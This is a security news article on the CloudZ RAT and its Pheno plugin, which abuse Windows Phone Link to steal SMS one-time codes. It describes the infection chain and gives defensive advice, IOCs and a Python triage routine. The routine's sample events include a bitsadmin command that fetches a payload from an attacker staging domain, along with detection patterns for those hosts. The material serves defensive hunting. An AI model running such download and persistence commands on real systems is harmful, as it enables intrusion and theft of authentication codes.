CloudZ RAT abuses Microsoft Phone Link to steal SMS OTPs and mobile notifications
A newly disclosed remote access trojan turns a built-in Windows feature into a credential-harvesting weapon, and it never has to touch your phone to steal codes meant for it.
Researchers at Cisco Talos have detailed an ongoing intrusion, active since at least January 2026, in which an unidentified threat actor is deploying a modular .NET-based RAT called CloudZ, paired with a previously undocumented plugin known as Pheno. Together, the two abuse Microsoft's Phone Link application to siphon off SMS messages, one-time passwords (OTPs), and authenticator app notifications directly from compromised Windows machines.
The campaign has been independently covered by The Hacker News, BleepingComputer, Infosecurity Magazine, and CSO Online, among others.
Why this attack matters
Microsoft Phone Link (formerly Your Phone) is a legitimate Windows 10/11 sync utility that bridges a PC to an Android or iOS device over Wi-Fi and Bluetooth. Once paired, it mirrors text messages, notifications, and calls onto the desktop and stores synchronized data locally in SQLite databases such as PhoneExperiences-*.db.
That convenience is exactly what the attackers exploit. Rather than breaching the phone itself (a much harder problem), CloudZ targets the PC-side artifacts of an already-trusted bridge. As Talos researchers Alex Karkins and Chetan Raghuprasad put it in their analysis, the goal was stealing victims' credentials and potentially OTPs, without ever deploying malware on the phone.
The implication is significant for enterprise defenders: controls focused on mobile device security can be sidestepped entirely if the linked Windows endpoint is compromised. SMS-based and even some app-based MFA flows that rely on push notifications become exposed the moment the desktop is.
The infection chain
According to Talos and corroborating reporting from BleepingComputer, the attack unfolds in several stages:
- Initial access (unknown vector). Talos has not yet determined how victims are first compromised, but the foothold leads to execution of a fake ConnectWise ScreenConnect update, typically named systemupdates.exe.
- Rust-compiled dropper. This binary establishes persistence by spawning a hidden PowerShell script that creates a scheduled task (named SystemWindowsApis) to run on system startup.
- .NET intermediate loader. Disguised as a text file in a system directory, the loader executes via the legitimate Windows binary regasm.exe under the SYSTEM account. It also performs heavy anti-analysis checks: timing-based sandbox evasion, enumeration of analysis tools (Wireshark, Fiddler, Procmon, Sysmon), and searches for VM/sandbox indicators in the system path and hostname, as documented by Infosecurity Magazine.
- CloudZ RAT deployment. Compiled in mid-January 2026 and obfuscated with ConfuserEx, CloudZ decrypts an embedded configuration, opens an encrypted TCP socket to its C2 server, and enters command dispatcher mode. It pulls additional configuration from attacker-controlled Cloudflare Workers domains and from Pastebin pages tagged with the handler HELLOHIALL, while rotating through three hardcoded user-agent strings and anti-caching headers to blend HTTP traffic with normal browser activity.
What CloudZ can do
Beyond Phone Link abuse, CloudZ is a fairly capable modular RAT. According to Talos and BleepingComputer, it supports browser data theft, host system profiling, file management (delete, download, write), and arbitrary command execution. It downloads its plugins using a three-method fallback (first attempting curl, then PowerShell's Invoke-WebRequest, and finally falling back to the bitsadmin LOLBin) to maximize the chance a payload lands successfully.
The Pheno plugin
Pheno is the part of the toolkit that turns a generic RAT infection into an OTP-interception capability. Per the Talos report, the plugin scans every running process for keywords associated with Phone Link (YourPhone, PhoneExperienceHost, and Link to Windows) and writes the results to a staging folder.
It then performs a secondary check: it reads back its own output files looking for the case-insensitive keyword "proxy". Phone Link uses a local proxy connection to relay traffic between the PC and the paired phone, so the presence of "proxy" in a previous run's output indicates an active session. When found, Pheno writes "Maybe connected" to its output file. CloudZ then reads that staging data and exfiltrates it to the C2 server.
With a confirmed Phone Link connection, the operator can then go after the SQLite database file (PhoneExperiences-*.db) where Phone Link locally caches synchronized SMS and notifications, and that's where authenticator app notifications and SMS-delivered OTPs live, as CyberInsider notes in its writeup.
Defensive recommendations
The advice from Talos and the wider reporting is consistent:
- Move off SMS-based MFA. It was already the weakest factor, and CloudZ is another reason to retire it. As BleepingComputer recommends, prefer phishing-resistant options like FIDO2 hardware keys, or authenticator apps that don't push codes to a paired desktop.
- Audit Phone Link usage. CyberInsider suggests reviewing whether Phone Link is actually needed in your environment, and disabling it if not.
- Hunt for the IOCs below. Talos has published ClamAV signatures, Snort rules, and IOCs on GitHub.
- Watch for suspicious scheduled tasks created under SYSTEM that invoke regasm.exe against unusual file paths, and for systemupdates.exe masquerading as ScreenConnect.
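As an added illustration (not code from Talos or any of the reports cited here), the following Python routine turns the infection-chain details and the hunting points above into a small triage pass over endpoint telemetry: the systemupdates.exe name, the SystemWindowsApis task, regasm.exe pointed at a non-DLL file (highest priority under SYSTEM), and curl/PowerShell/bitsadmin downloads from the staging hosts in the IOC list. The record layout, user names, file paths and the sample events are all constructed assumptions, not real logs.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry (not real logs): process- and task-creation records
# shaped loosely like Sysmon/EDR output, plus one benign regasm.exe run for contrast.
SAMPLE_EVENTS = [
    {"user": r"CORP\alice", "image": r"C:\Users\alice\Downloads\systemupdates.exe",
     "cmdline": "systemupdates.exe"},
    {"user": r"NT AUTHORITY\SYSTEM", "task": "SystemWindowsApis",
     "cmdline": r"powershell.exe -WindowStyle Hidden -File C:\ProgramData\run.ps1"},
    {"user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe",
     "cmdline": r"regasm.exe /U C:\Windows\System32\Tasks\update.txt"},
    {"user": r"CORP\alice", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer j https://orange-cell-1353.hellohiall.workers.dev/pheno.exe C:\Users\Public\p.exe"},
    {"user": r"CORP\alice",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe",
     "cmdline": r"regasm.exe C:\Program Files\Vendor\Vendor.dll"},
]

DOWNLOADERS = {"curl.exe", "bitsadmin.exe", "powershell.exe"}  # CloudZ's three-way fallback
STAGING_HOSTS = re.compile(r"hellohiall\.workers\.dev|pastebin\.com", re.I)  # from the IOC list
URL_RE = re.compile(r"https?://\S+", re.I)

def image_name(event):
    return PureWindowsPath(event.get("image", "")).name.lower()

def regasm_target(cmdline):
    """Extension of the file regasm.exe was pointed at ('' if none)."""
    args = [a for a in cmdline.split()[1:] if not a.startswith("/")]  # drop /U, /codebase ...
    return PureWindowsPath(" ".join(args)).suffix.lower() if args else ""

def triage(event):
    """Return (rule, detail) hits for one record; an empty list means nothing fired."""
    hits, name = [], image_name(event)
    cmd, user = event.get("cmdline", ""), event.get("user", "").upper()
    if name == "systemupdates.exe":                             # fake ScreenConnect update
        hits.append(("fake-screenconnect-updater", event["image"]))
    if event.get("task", "").lower() == "systemwindowsapis":    # persistence task name
        hits.append(("persistence-task-name", event["task"]))
    if name == "regasm.exe" and regasm_target(cmd) != ".dll":
        # Loader is a .NET assembly disguised as a text file; SYSTEM matches the reported pattern.
        hits.append(("regasm-non-dll-target", ("high" if "SYSTEM" in user else "medium") + ": " + cmd))
    if name in DOWNLOADERS:
        hits += [("staging-download", u) for u in URL_RE.findall(cmd) if STAGING_HOSTS.search(u)]
    return hits

def scan(events):  # record index -> hits, only for records that fired at least one rule
    return {i: h for i, e in enumerate(events) if (h := triage(e))}
```

Run `scan(SAMPLE_EVENTS)` to see the four malicious records flagged and the vendor DLL registration left alone; in practice feed it your own exported process- and task-creation events after mapping their field names.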
Talos has not attributed the campaign to any known threat actor.
Indicators of Compromise
Sourced from the Cisco Talos IOC repository.
File hashes (SHA-256)

| Component | SHA-256 |
| --- | --- |
| Rusty dropper | 65fcd965040fabeb6f092df0a4b6856125018bb3b6a1876342da458139f77dac |
| .NET loader | ed5de036edbbda52ab0049d2163607038d38a49404a46b6bcfc4bac26b743832 |
| .NET loader | 24398b75be2645e6c695e529e62e60deb418143a4bbea13c561d3c361419eb54 |
| CloudZ RAT | 5b7284bcf30569ae400e416a62391720cc9081e6047f15816f9d1a04a06eb321 |
| Pheno plugin | 33af554562176eff34598a839051b8e91692b0305edfdbb4d8eb9df0103ffd98 |
Staging URLs
Domains
- calm-wildflower-1349[.]hellohiall[.]workers[.]dev
- orange-cell-1353[.]hellohiall[.]workers[.]dev
- round-cherry-4418[.]hellohiall[.]workers[.]dev
IP addresses
- 185[.]196[.]10[.]136 // C2 server
References
- Cisco Talos, "CloudZ RAT potentially steals OTP messages using Pheno plugin"
- Cisco Talos, IOC repository (GitHub)
- The Hacker News, "Windows Phone Link Exploited by CloudZ RAT to Steal Credentials and OTPs"
- BleepingComputer, "CloudZ malware abuses Microsoft Phone Link to steal SMS and OTPs"
- Infosecurity Magazine, "CloudZ Malware Abuses Phone Link to Steal SMS OTPs"
- CSO Online, "Stealthy malware abuses Microsoft Phone Link to siphon SMS OTPs from enterprise PCs"
- CyberInsider, "CloudZ malware hijacks Microsoft Phone Link to intercept SMS and OTPs"